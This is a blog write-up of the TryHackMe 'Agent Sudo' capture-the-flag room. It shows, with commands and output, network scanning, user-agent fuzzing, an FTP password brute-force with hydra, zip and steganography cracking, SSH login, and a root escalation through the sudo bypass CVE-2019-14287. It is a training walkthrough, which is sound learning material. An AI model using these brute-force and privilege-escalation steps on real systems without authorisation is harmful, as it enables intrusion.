---
layout: post
title: "Agent Sudo - Write-up - TryHackMe"
lang: en
categories:
  - writeups
tags:
  - security
  - writeups
  - thm
  - linux
  - eop
  - stegano
date: 2021/03/19 20:37:00
thumbnail: /images/TryHackMe/agentsudoctf.png
authorId: noraj
toc: true
---
# Information

## Room

- **Name:** Agent Sudo
- **Profile:** [tryhackme.com](https://tryhackme.com/room/agentsudoctf)
- **Difficulty:** Easy
- **Description**: You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth.

![Agent Sudo](/images/TryHackMe/agentsudoctf.png)

# Write-up

## Overview

Install tools used in this WU on BlackArch Linux:

```
$ sudo pacman -S nmap ffuf curl hydra steghide binwalk john p7zip
```

## Network enumeration

Service scan with nmap:

```plaintext
# Nmap 7.91 scan initiated Fri Mar 19 15:05:55 2021 as: nmap -sSVC -p- -oA nmap_full 10.10.48.220
Nmap scan report for 10.10.48.220
Host is up (0.081s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
|   256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
|_  256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Annoucement
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 19 15:09:12 2021 -- 1 IP address (1 host up) scanned in 197.36 seconds
```

## Web discovery

`curl http://10.10.48.220`

```html
<!DocType html>
<html>
<head>
        <title>Annoucement</title>
</head>

<body>
<p>
        Dear agents,
        <br><br>
        Use your own <b>codename</b> as user-agent to access the site.
        <br><br>
        From,<br>
        Agent R
</p>
</body>
</html>
```

Let's play with the user-agent:

If we use `R` codename as user-agent the page returns another message:

> What are you doing! Are you one of the 25 employees? If not, I'm going to report this incident.

Let's create a dict with all letters with a ruby script:

```ruby
data = ('A'..'Z').to_a.join("\n")
File.write('fuzz.txt', data)
```

And then use fuff to see which agent letter redirects us:

```plaintext
$ ffuf -u http://10.10.48.220/ -c -w fuzz.txt -H 'User-Agent: FUZZ' -mc 302

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.48.220/
 :: Wordlist         : FUZZ: fuzz.txt
 :: Header           : User-Agent: FUZZ
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 302
________________________________________________

C                       [Status: 302, Size: 218, Words: 13, Lines: 19]
:: Progress: [26/26] :: Job [1/1] :: 25 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
```

Let's see where it redirects us:

```plaintext
$ curl http://10.10.48.220 -A C --head
HTTP/1.1 302 Found
Date: Fri, 19 Mar 2021 15:42:50 GMT
Server: Apache/2.4.29 (Ubuntu)
Location: agent_C_attention.php
Content-Type: text/html; charset=UTF-8
```

Another message there:

> Attention chris,
>
> Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak!
>
> From,
> Agent R

## FTP bruteforce

We know a user is named `chris` so let's try to BF its password over FTP.

```plaintext
$ hydra -l chris -P /usr/share/wordlists/passwords/rockyou.txt 10.10.48.220 ftp -I
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-19 16:56:03
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ftp://10.10.48.220:21/

[21][ftp] host: 10.10.48.220   login: chris   password: crystal
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-19 16:56:55
```

We can connect to the ftp server see a file `To_agentJ.txt`:

```plaintext
Dear agent J,

All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.

From,
Agent C
```

## Stega

Let's see hidden files:

```plaintext
$ binwalk cutie.png

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 528 x 528, 8-bit colormap, non-interlaced
869           0x365           Zlib compressed data, best compression
34562         0x8702          Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820         0x8804          End of Zip archive, footer length: 22
```

Extract them, the zip is encrypted so we must crack its password:

```plaintext
$ binwalk -e cutie.png

$ zip2john _cutie.png.extracted/8702.zip
8702.zip/To_agentR.txt:$zip2$*0*1*0*4673cae714579045*67aa*4e*61c4cf3af94e649f827e5964ce575c5f7a239c48fb992c8ea8cbffe51d03755e0ca861a5a3dcbabfa618784b85075f0ef476c6da8261805bd0a4309db38835ad32613e3dc5d7e87c0f91c0b5e64e*4969f382486cb6767ae6*$/zip2$:To_agentR.txt:8702.zip:_cutie.png.extracted/8702.zip

$ john hash.txt -w=/usr/share/wordlists/passwords/rockyou.txt
Warning: detected hash type "ZIP", but the string is also recognized as "ZIP-opencl"
Use the "--format=ZIP-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 128/128 AVX 4x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
alien            (8702.zip/To_agentR.txt)
1g 0:00:00:00 DONE (2021-03-19 17:52) 2.173g/s 53426p/s 53426c/s 53426C/s chatty..280690
Use the "--show" option to display all of the cracked passwords reliably
Session completed

$ 7z x _cutie.png.extracted/8702.zip
```

There is only one file: `To_agentR.txt`.

```plaintext
Agent C,

We need to send the picture to 'QXJlYTUx' as soon as possible!

By,
Agent R
```

It's a base64 string:

```plaintext
$ printf %s 'QXJlYTUx' | base64 -d
Area51
```

It's maybe a password. For this step I read another write-up since it's a
false-stage guess step. You have to use the password with steghide on the
other image.

```plaintext
$ steghide info cute-alien.jpg
"cute-alien.jpg":
  format: jpeg
  capacity: 1,8 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
  embedded file "message.txt":
    size: 181,0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes

$ steghide extract -sf cute-alien.jpg
Enter passphrase:
wrote extracted data to "message.txt"

$ cat message.txt
Hi james,

Glad you find this message. Your login password is hackerrules!

Don't ask me why the password look cheesy, ask agent R who set this password for you.

Your buddy,
chris

$ ssh james@10.10.235.174
```

## OSINT

Let's download the image:

```plaintext
$ scp james@10.10.235.174:Alien_autospy.jpg ./
```

The google reverse image search gives you something about the
_Roswell UFO incident_ but you need to find the [Foxnews name](https://www.foxnews.com/science/filmmaker-reveals-how-he-faked-infamous-roswell-alien-autopsy-footage-in-a-london-apartment).

## EoP

```plaintext
james@agent-sudo:~$ sudo -l
[sudo] password for james: 
Matching Defaults entries for james on agent-sudo:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on agent-sudo:
    (ALL, !root) /bin/bash
```

Looks like CVE-2019-14287, we can spawn command as anyone but root.

I wrote an article: [Some sudo elevation of privilege vulnerabilities](https://blog.sec-it.fr/en/2021/02/08/sudo-vulns/).

> An introduction to 3 sudo vulnerabilities: CVE-2019-14287, CVE-2019-18634, CVE-2021-3156.

All we need to do is:

```plaintext
$ sudo -u \#-1 /bin/bash
root@agent-sudo:~# id
uid=0(root) gid=1000(james) groups=1000(james)
```
